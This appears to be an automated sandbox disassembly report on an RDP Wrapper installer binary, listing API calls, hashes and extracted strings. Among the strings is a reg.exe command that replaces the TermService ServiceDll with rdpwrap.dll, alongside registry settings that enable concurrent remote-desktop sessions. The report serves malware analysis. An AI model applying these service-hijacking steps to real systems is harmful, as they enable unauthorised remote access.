                                                                                • String ID: $sD$AllowMultipleTSSessions$EnableConcurrentSessions$Name$RDPClip$RDPDND$Type$[-] OpenKey error (code $\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon$\SYSTEM\CurrentControlSet\Control\Terminal Server$\SYSTEM\CurrentControlSet\Control\Terminal Server\AddIns$\SYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Clip Redirector$\SYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\DND Redirector$\SYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VC$\SYSTEM\CurrentControlSet\Control\Terminal Server\Licensing Core$fDenyTSConnections
                                                                                • API String ID: 1452528299-1114397459
                                                                                • Opcode ID: 22b9b6838edb48365cdfb4778b466381cbf59e10845c44ab03fa5598231b4397
                                                                                • Instruction ID: d5bff1feb4e6776106dd90f858afd21f9f4463beb35b4115f94bb768dd44f540
                                                                                • Opcode Fuzzy Hash: 22b9b6838edb48365cdfb4778b466381cbf59e10845c44ab03fa5598231b4397
                                                                                • Instruction Fuzzy Hash: 97A16E70B052005BEB10BBBB984256E76A5DB8D308F51A47FF400A76D2CB3DAC05972E
                                                                                Function 00408F6C Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 156registrystringCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1050 408f6c-408f95 call 406bd8 1053 408f97-408faa GetModuleFileNameW 1050->1053 1054 408fac-408fc1 call 406c7c lstrcpynW 1050->1054 1055 408fc6-408fce 1053->1055 1054->1055 1058 408fd4-408ff5 RegOpenKeyExW 1055->1058 1059 40913b-409150 call 406be0 1055->1059 1061 409055-40908f call 408d70 RegQueryValueExW 1058->1061 1062 408ff7-409013 RegOpenKeyExW 1058->1062 1069 409091-4090c2 call 4041b0 RegQueryValueExW call 406d9c 1061->1069 1070 4090c4-4090de RegQueryValueExW 1061->1070 1062->1061 1063 409015-409031 RegOpenKeyExW 1062->1063 1063->1061 1066 409033-40904f RegOpenKeyExW 1063->1066 1066->1059 1066->1061 1072 40910f-409120 1069->1072 1071 4090e0-40910a call 4041b0 RegQueryValueExW call 406d9c 1070->1071 1070->1072 1071->1072 1077 409122-409125 call 4041cc 1072->1077 1078 40912a-409133 RegCloseKey 1072->1078 1077->1078
                                                                                APIs
                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,00409151,?,00000000), ref: 00408FA5
                                                                                • lstrcpynW.KERNEL32(?,00000000,00000105,00000000,00409151,?,00000000), ref: 00408FC1
                                                                                • RegOpenKeyExW.ADVAPI32(80000001,Software\CodeGear\Locales,00000000,000F0019,?,?,00000000,00000105,00000000,00409151,?,00000000), ref: 00408FEE
                                                                                • RegOpenKeyExW.ADVAPI32(80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,?,00000000,00000105,00000000,00409151), ref: 0040900C
                                                                                • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,?), ref: 0040902A
                                                                                • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001), ref: 00409048
                                                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,00409134,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,?,00000000), ref: 00409088
                                                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,?,00000000,00000000,00000000,?,00000000,00409134,?,80000001), ref: 004090B3
                                                                                • RegQueryValueExW.ADVAPI32(?,00409208,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,?,00000000,00409134,?,80000001), ref: 004090D7
                                                                                • RegQueryValueExW.ADVAPI32(?,00409208,00000000,00000000,?,?,?,00409208,00000000,00000000,00000000,?,?,?,00000000,00000000), ref: 00409100
                                                                                • RegCloseKey.ADVAPI32(?,0040913B,00000000,00000000,?,?,?,00000000,00000000,00000000,?,00000000,00409134,?,80000001,Software\CodeGear\Locales), ref: 0040912E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: OpenQueryValue$CloseFileModuleNamelstrcpyn
                                                                                • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales$Software\CodeGear\Locales
                                                                                • API String ID: 3482678030-345420546
                                                                                • Opcode ID: b86ae2d81a9e05b6b7bf3f0ce843eb1dbeb4dae58668f089461cbe54660652d9
                                                                                • Instruction ID: 299ddb9754ebd29522f96ae12af661ce277d6f97d31c05324fadffe1222b4d16
                                                                                • Opcode Fuzzy Hash: b86ae2d81a9e05b6b7bf3f0ce843eb1dbeb4dae58668f089461cbe54660652d9
                                                                                • Instruction Fuzzy Hash: CA510071B40209BEEB10EAA5CD46FAE77BCEB48704F504477B604F61C2D6B8AE408A5D
                                                                                Function 0043A7BC Relevance: 24.2, APIs: 2, Strings: 14, Instructions: 181COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetLastError.KERNEL32(00000000,0043AA55,?,?,00447324,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00443A16,00000000,00443FB2), ref: 0043A827
                                                                                • GetLastError.KERNEL32(00000000,0043AA55,?,?,00447324,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00443A16,00000000,00443FB2), ref: 0043A91D
                                                                                  • Part of subcall function 00438860: RegFlushKey.ADVAPI32(00010000,004375FC,004388B7,004375FC,00000001,004387C6,?,00447324,0043A802,00000000,0043AA55,?,?,00447324,00000000,00000000), ref: 00438871
                                                                                  • Part of subcall function 00438860: RegCloseKey.ADVAPI32(00010000,004375FC,004388B7,004375FC,00000001,004387C6,?,00447324,0043A802,00000000,0043AA55,?,?,00447324,00000000,00000000), ref: 0043887A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast$CloseFlush
                                                                                • String ID: $sD$ImagePath$ServiceDll$[*] ImagePath: "$[*] ServiceDll: "$[-] Another third-party TermService library is installed.$[-] OpenKeyReadOnly error (code $[-] TermService is hosted in a custom application (BeTwin, etc.) - unsupported.$\SYSTEM\CurrentControlSet\Services\TermService$\SYSTEM\CurrentControlSet\Services\TermService\Parameters$rdpwrap.dll$svchost -k$svchost.exe$termsrv.dll
                                                                                • API String ID: 1149308822-2563127478
                                                                                • Opcode ID: 3e349bb9003ee561f3f41bf2c4cd298ce689c8a6cca98ee662a00d79e13e63ec
                                                                                • Instruction ID: 1ac512ede3db6dba28468dccd327cdb8adfd53dd4df03d49c6afb8088628474e
                                                                                • Opcode Fuzzy Hash: 3e349bb9003ee561f3f41bf2c4cd298ce689c8a6cca98ee662a00d79e13e63ec
                                                                                • Instruction Fuzzy Hash: 01515774B442005BD700FBBA8D4255EB2659F8930CB51A43FB840BB796CB3CEC158AAF
                                                                                Function 00408C28 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 77stringCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(00449B54,00000000,00408D2D,?,?,00000000,00000000,?,00409540,?,?,?,00000000,00000105,00000000,004095BB), ref: 00408C46
                                                                                • LeaveCriticalSection.KERNEL32(00449B54,00449B54,00000000,00408D2D,?,?,00000000,00000000,?,00409540,?,?,?,00000000,00000105,00000000), ref: 00408C6A
                                                                                • LeaveCriticalSection.KERNEL32(00449B54,00449B54,00000000,00408D2D,?,?,00000000,00000000,?,00409540,?,?,?,00000000,00000105,00000000), ref: 00408C79
                                                                                • IsValidLocale.KERNEL32(00000000,00000002,00449B54,00449B54,00000000,00408D2D,?,?,00000000,00000000,?,00409540,?,?,?,00000000), ref: 00408C8D
                                                                                • EnterCriticalSection.KERNEL32(00449B54,00000000,00000002,00449B54,00449B54,00000000,00408D2D,?,?,00000000,00000000,?,00409540,?,?,?), ref: 00408CEA
                                                                                • lstrcpynW.KERNEL32(en-GB,en,en-US,,00000000,000000AA,00449B54,00000000,00000002,00449B54,00449B54,00000000,00408D2D,?,?,00000000,00000000,?,00409540), ref: 00408D08
                                                                                • LeaveCriticalSection.KERNEL32(00449B54,en-GB,en,en-US,,00000000,000000AA,00449B54,00000000,00000002,00449B54,00449B54,00000000,00408D2D,?,?,00000000,00000000), ref: 00408D12
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$Leave$Enter$LocaleValidlstrcpyn
                                                                                • String ID: en-GB,en,en-US,
                                                                                • API String ID: 1058953229-3021119265
                                                                                • Opcode ID: f5c0c5a953935993f8144897554dda3b04a66e7f6cf498fae83c5be40df86a5b
                                                                                • Instruction ID: 9b1ce77b3c0781b783b438d4c88a1dd796634ce3a4aca31124bb85a30b48e6d3
                                                                                • Opcode Fuzzy Hash: f5c0c5a953935993f8144897554dda3b04a66e7f6cf498fae83c5be40df86a5b
                                                                                • Instruction Fuzzy Hash: B321AE203042556AEB50B77A9E57B6A2169EF4570CF60443FB481B72D2CEBCAC04E22E
                                                                                Function 0043C1C8 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 53COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • OpenProcess.KERNEL32(00000001,00000000,00000D10,?,00447324,00443F30,00000000,00443FB2,?,?,?,?,00000008,00000000,00000000), ref: 0043C1CF
                                                                                • GetLastError.KERNEL32(00000001,00000000,00000D10,?,00447324,00443F30,00000000,00443FB2,?,?,?,?,00000008,00000000,00000000), ref: 0043C1DA
                                                                                • TerminateProcess.KERNEL32(00000000,00000000,00000001,00000000,00000D10,?,00447324,00443F30,00000000,00443FB2,?,?,?,?,00000008,00000000), ref: 0043C219
                                                                                • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000D10,?,00447324,00443F30,00000000,00443FB2,?,?,?,?,00000008), ref: 0043C223
                                                                                • GetLastError.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000D10,?,00447324,00443F30,00000000,00443FB2,?,?,?,?,00000008), ref: 0043C228
                                                                                • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000D10,?,00447324,00443F30,00000000,00443FB2,?,?,?,?,00000008), ref: 0043C265
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseErrorHandleLastProcess$OpenTerminate
                                                                                • String ID: $sD$[-] OpenProcess error (code $[-] TerminateProcess error (code
                                                                                • API String ID: 1809907545-775158141
                                                                                • Opcode ID: 6f554e20b072eb6f5660c25ac1f2be49616fb729524d0b6480b7b10d1be33d93
                                                                                • Instruction ID: c032a40b630c9990863936c46c82d74717666648ea03c3b6a4bb658b84b7f9ba
                                                                                • Opcode Fuzzy Hash: 6f554e20b072eb6f5660c25ac1f2be49616fb729524d0b6480b7b10d1be33d93
                                                                                • Instruction Fuzzy Hash: EB01F6A5B442111AE610B3FB0D82B2F255A8F8A75CF02917FB504B62D7CA3C9C11977F
                                                                                Function 0040472C Relevance: 15.1, APIs: 10, Instructions: 129fileCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1434 40472c-404740 1435 404742-404743 1434->1435 1436 40474d-404763 1434->1436 1438 404765-404774 1435->1438 1439 404745-404746 1435->1439 1437 40478c-40479f 1436->1437 1443 4047a5-4047bd CreateFileW 1437->1443 1444 404857-404874 1437->1444 1442 404785 1438->1442 1440 404776-404780 1439->1440 1441 404748 1439->1441 1440->1442 1445 4048b5-4048b6 1441->1445 1442->1437 1448 4047c3-4047cb 1443->1448 1449 4048cb-4048d6 GetLastError 1443->1449 1446 404876-404878 1444->1446 1447 40487a-404880 1444->1447 1450 404888-404890 GetStdHandle 1446->1450 1451 404882-404884 1447->1451 1452 404886 1447->1452 1453 4047d1-4047df GetFileSize 1448->1453 1454 404894-40489a 1448->1454 1449->1445 1450->1449 1456 404892 1450->1456 1451->1450 1452->1450 1453->1449 1455 4047e5-4047ea 1453->1455 1457 4048b3 1454->1457 1458 40489c-4048a5 GetFileType 1454->1458 1459 4047ec 1455->1459 1460 4047ee-4047fb SetFilePointer 1455->1460 1456->1454 1457->1445 1461 4048b7-4048c9 CloseHandle 1458->1461 1462 4048a7-4048aa 1458->1462 1459->1460 1460->1449 1463 404801-40481d ReadFile 1460->1463 1461->1445 1462->1457 1464 4048ac 1462->1464 1463->1449 1465 404823 1463->1465 1464->1457 1466 404825-404827 1465->1466 1466->1454 1467 404829-404831 1466->1467 1468 404833-404834 1467->1468 1469 404836-404845 SetFilePointer 1467->1469 1468->1466 1469->1449 1470 40484b-404853 SetEndOfFile 1469->1470 1470->1449 1471 404855 1470->1471 1471->1454
                                                                                APIs
                                                                                • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 004047B5
                                                                                • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 004047D9
                                                                                • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 004047F5
                                                                                • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000001,00000000), ref: 00404816
                                                                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 0040483F
                                                                                • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 0040484D
                                                                                • GetStdHandle.KERNEL32(000000F5), ref: 00404888
                                                                                • GetFileType.KERNEL32(?,000000F5), ref: 0040489E
                                                                                • CloseHandle.KERNEL32(?,?,000000F5), ref: 004048B9
                                                                                • GetLastError.KERNEL32(000000F5), ref: 004048D1
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                                • String ID:
                                                                                • API String ID: 1694776339-0
                                                                                • Opcode ID: 88c077e9ec81b413e44c4e0d06344b1548c794062b539f639d5ca81acda773dd
                                                                                • Instruction ID: de0dc4671a2c55deed7a27a48df34c8c3110be8be3acd5b577aa359944728292
                                                                                • Opcode Fuzzy Hash: 88c077e9ec81b413e44c4e0d06344b1548c794062b539f639d5ca81acda773dd
                                                                                • Instruction Fuzzy Hash: EA4183B5500A40A9E730BF24C90972376E4EBC0714F20CE3FE692B66D0E7BDA845878D
                                                                                Function 0043C31C Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 70processsynchronizationCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000044,?,00000000,0043C3EC,?,00447324), ref: 0043C37B
                                                                                • GetLastError.KERNEL32(00000000,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000044,?,00000000,0043C3EC,?,00447324), ref: 0043C384
                                                                                • CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000044,?,00000000,0043C3EC,?,00447324), ref: 0043C3BB
                                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000044,?,00000000,0043C3EC), ref: 0043C3C6
                                                                                • CloseHandle.KERNEL32(?,?,000000FF,?,00000000,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000044,?,00000000,0043C3EC), ref: 0043C3CF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseHandle$CreateErrorLastObjectProcessSingleWait
                                                                                • String ID: $sD$D$[-] CreateProcess error (code:
                                                                                • API String ID: 1377960556-1026335874
                                                                                • Opcode ID: 58e4cee0019deaf83b36aa1437f8aa0207d0818498334e5e25efdc6c94b6a7a4
                                                                                • Instruction ID: 1d017b2d671d3512e5dabab7732e068b99e5a835ee42228d460eb482b244bc14
                                                                                • Opcode Fuzzy Hash: 58e4cee0019deaf83b36aa1437f8aa0207d0818498334e5e25efdc6c94b6a7a4
                                                                                • Instruction Fuzzy Hash: D21151B0644204AADB00F7E5CD82F9E77B89F49714F61453BF610F61D2D67CA910972E
                                                                                Function 00403028 Relevance: 12.2, APIs: 8, Instructions: 221sleepCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1496 403028-403037 1497 403120-403123 1496->1497 1498 40303d-403041 1496->1498 1501 403210-403214 1497->1501 1502 403129-403133 1497->1502 1499 403043-40304a 1498->1499 1500 4030a4-4030ad 1498->1500 1508 403078-40307a 1499->1508 1509 40304c-403057 1499->1509 1500->1499 1507 4030af-4030b8 1500->1507 1505 402ab4-402ad9 call 402a08 1501->1505 1506 40321a-40321f 1501->1506 1503 4030e4-4030f1 1502->1503 1504 403135-403141 1502->1504 1503->1504 1517 4030f3-4030fc 1503->1517 1512 403143-403146 1504->1512 1513 403178-403186 1504->1513 1525 402af5-402afc 1505->1525 1526 402adb-402aea VirtualFree 1505->1526 1507->1500 1516 4030ba-4030ce Sleep 1507->1516 1514 40307c-40308d 1508->1514 1515 40308f 1508->1515 1510 403060-403075 1509->1510 1511 403059-40305e 1509->1511 1520 40314a-40314e 1512->1520 1513->1520 1522 403188-40318d call 402884 1513->1522 1514->1515 1521 403092-40309f 1514->1521 1515->1521 1516->1499 1523 4030d4-4030df Sleep 1516->1523 1517->1503 1524 4030fe-403112 Sleep 1517->1524 1527 403190-40319d 1520->1527 1528 403150-403156 1520->1528 1521->1502 1522->1520 1523->1500 1524->1504 1530 403114-40311b Sleep 1524->1530 1535 402afe-402b1a VirtualQuery VirtualFree 1525->1535 1531 402af0-402af3 1526->1531 1532 402aec-402aee 1526->1532 1527->1528 1537 40319f-4031a6 call 402884 1527->1537 1533 4031a8-4031b2 1528->1533 1534 403158-403176 call 4028c4 1528->1534 1530->1503 1540 402b2f-402b31 1531->1540 1532->1540 1538 4031e0-40320d call 402924 1533->1538 1539 4031b4-4031dc VirtualFree 1533->1539 1542 402b21-402b27 1535->1542 1543 402b1c-402b1f 1535->1543 1537->1528 1548 402b33-402b43 1540->1548 1549 402b46-402b56 1540->1549 1542->1540 1547 402b29-402b2d 1542->1547 1543->1540 1547->1535 1548->1549
                                                                                APIs
                                                                                • Sleep.KERNEL32(00000000,?,?,00000000,00402C9A), ref: 004030BE
                                                                                • Sleep.KERNEL32(0000000A,00000000,?,?,00000000,00402C9A), ref: 004030D8
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Sleep
                                                                                • String ID:
                                                                                • API String ID: 3472027048-0
                                                                                • Opcode ID: 93a1e75d392f98f45c217d5d1b4a4ce21d939f5f7de44ee49ef913328a692d58
                                                                                • Instruction ID: 8e11df8688fcfc32dba15f0401baaa5f3e1cf13b6ab2085a37f93781684c6a2f
                                                                                • Opcode Fuzzy Hash: 93a1e75d392f98f45c217d5d1b4a4ce21d939f5f7de44ee49ef913328a692d58
                                                                                • Instruction Fuzzy Hash: 9F7115312052009FD715CF69CE89726BFE4AB89315F14827FD444AB3D6D7B889458789
                                                                                Function 0043C598 Relevance: 12.1, APIs: 1, Strings: 7, Instructions: 98COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetLastError.KERNEL32(00000000,0043C716,?,?,?,00447324,00000000,00000000,00000000,?,00443BC6,00000000,00443FB2), ref: 0043C600
                                                                                Strings
                                                                                • $sD, xrefs: 0043C60D
                                                                                • \SYSTEM\CurrentControlSet\Services\TermService\Parameters, xrefs: 0043C5EF
                                                                                • %SystemRoot%, xrefs: 0043C682
                                                                                • ServiceDll, xrefs: 0043C650
                                                                                • [-] OpenKey error (code , xrefs: 0043C612
                                                                                • \system32\reg.exe" add HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters /v ServiceDll /t REG_EXPAND_SZ /d ", xrefs: 0043C68F
                                                                                • " /f, xrefs: 0043C69A
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast
                                                                                • String ID: " /f$$sD$%SystemRoot%$ServiceDll$[-] OpenKey error (code $\SYSTEM\CurrentControlSet\Services\TermService\Parameters$\system32\reg.exe" add HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "
                                                                                • API String ID: 1452528299-2956723230
                                                                                • Opcode ID: 0c5b84642f90c2c43a864384322aaebdce3b992f712f0d9bf057b86ee0e3b406
                                                                                • Instruction ID: 86ae2d0f633f2b7d457566c29c3046f730a81976c8e7ce91198a0ccb689aa4bb
                                                                                • Opcode Fuzzy Hash: 0c5b84642f90c2c43a864384322aaebdce3b992f712f0d9bf057b86ee0e3b406
                                                                                • Instruction Fuzzy Hash: B331DE74A04204AFDB10FB66CC82A2E77A5DB4D308F61A07BF800B7291CB3CAD049B5D
                                                                                Function 00402CA4 Relevance: 9.0, APIs: 7, Instructions: 298sleepCOMMON
                                                                                Download Yara Rule
                                                                                APIs
